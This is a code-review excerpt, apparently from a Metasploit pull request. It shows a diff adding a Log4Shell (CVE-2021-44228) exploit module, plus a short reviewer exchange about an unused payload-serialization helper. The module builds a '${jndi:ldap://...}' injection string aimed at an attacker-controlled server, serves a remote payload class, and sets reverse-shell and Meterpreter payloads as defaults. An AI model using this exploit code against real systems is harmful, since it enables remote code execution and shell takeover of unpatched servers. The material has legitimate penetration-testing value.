modules/exploits/multi/http/log4shell_header_injection.rb

```diff
@@ -0,0 +1,363 @@
+      ],
+      'References' => [
+        [ 'CVE', '2021-44228' ],
+      ],
+      'DisclosureDate' => '2021-12-09',
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'SRVPORT' => 389,
+        'WfsDelay' => 30,
+        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
+      },
+      'Targets' => [
+        [
+          'Automatic', {
+            'Platform' => 'java',
+            'Arch' => [ARCH_JAVA],
+            'RemoteLoad' => true,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'java/shell_reverse_tcp'
+            }
+          }
+        ],
+        [
+          'Windows', {
+            'Platform' => 'win',
+            'RemoteLoad' => false,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+            }
+          },
+        ],
+        [
+          'Linux', {
+            'Platform' => 'unix',
+            'RemoteLoad' => false,
+            'Arch' => [ARCH_CMD],
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_bash'
+            }
+          },
+        ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'AKA' => ['Log4Shell', 'LogJam'],
+        'Reliability' => [REPEATABLE_SESSION],
+        'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]
+      },
+      'Stance' => Msf::Exploit::Stance::Aggressive
+    )
+    register_options([
+      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
+      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
+      OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),
+      OptEnum.new('YSOSERIAL_PAYLOAD', [
+        true, 'The ysoserial payload to use for deserialization', 'CommonsBeanutils1',
+        Msf::Util::JavaDeserialization.ysoserial_payload_names
+      ], conditions: %w[TARGET != Automatic]),
+      OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic]),
+      OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true])
+    ])
+  end
+
+  def check
+    validate_configuration!
+    # set these scanner options as appropriate based on the config
+    datastore['URIS_FILE'] = nil
+    if !datastore['HTTP_HEADER'].blank?
+      datastore['HEADERS_FILE'] = nil
+    end
+
+    @checkcode = super
+  end
+
+  def jndi_string
+    "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}"
+  end
+
+  def resource_url_string
+    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
+  end
+
+  #
+  # Use Ruby Java bridge to create a Java-natively-serialized object
+  #
+  # @return [String] Marshalled serialized byteArray of the loader class
+  def byte_array_payload(pay_class = 'metasploit.PayloadFactory')
```

Comment:
This doesn't seem to be used anywhere as of now. Is this for potential future additions or is it no longer needed in the module?

Reply:
Not used currently - exposure of a method we can later leverage to build more custom/dynamic serialization payloads. Breadcrumbs to follow later or for some other entrepreneurial hacker to pick up.